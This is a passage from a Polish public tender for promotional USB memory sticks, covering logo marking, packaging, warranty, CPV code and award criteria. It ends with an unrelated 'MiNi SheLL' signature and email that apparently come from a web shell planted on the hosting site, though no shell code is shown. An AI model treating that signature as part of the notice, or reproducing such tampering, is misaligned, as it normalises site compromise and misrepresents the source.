Znakowanie: nadruk (sitodruk lub tampon druk) lub grawer laserowy na elementach metalowych, logotypów w wersji jednokolorowej (logo CKPŚ, logo Programu Infrastruktura i Środowisko, flaga Unii Europejskiej z odniesieniem do Funduszu Spójności). W przypadku trudności technicznych z umieszczeniem 3 logotypów na powierzchni pamięci USB Zamawiający dopuszcza oznakowanie pamięci USB w wariancie minimalnym to znaczy (logo Programu Infrastruktura 
i Środowisko i flaga Unii Europejskiej).
Gwarancja: minimum 24 miesiące
Opakowanie: Metalowe pudełeczko zamykane pokrywką w kolorze szarym, pokrywka częściowo przeźroczysta. Na pudełku nadruk logotypów w wersji achromatycznej (CKPŚ, logo Programu Infrastruktura i Środowisko, flaga Unii Europejskiej z odniesieniem do Funduszu Spójności). Wewnątrz pianka wycięta pod wymiar pamięci USB, pełniącą jednocześnie funkcję stabilizującą wewnątrz pudełka. 

Oferowane materiały promocyjne, o których mowa powyżej, muszą być fabrycznie nowe, bez śladów użytkowania, pełnowartościowe, nieprefabrykowane, nieuszkodzone, bez jakichkolwiek wad fabrycznych czy użytkowych. W czasie dostawy zamówienia Wykonawca jest zobowiązany zabezpieczyć dostarczany towar przed wpływami atmosferycznymi, które mogłyby wpłynąć na jakość dostarczanych produktów.

Wszystkie materiały ujęte w 3. części zamówienia będą objęte gwarancją Wykonawcy i zostaną dostarczone Zamawiającemu wraz z dokumentem gwarancji, przy tym okres gwarancji powinien wynosić co najmniej 24 miesiące - liczone od dnia podpisania protokołu odbioru umowy. Wszelkie koszty gwarancji muszą być zawarte w cenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com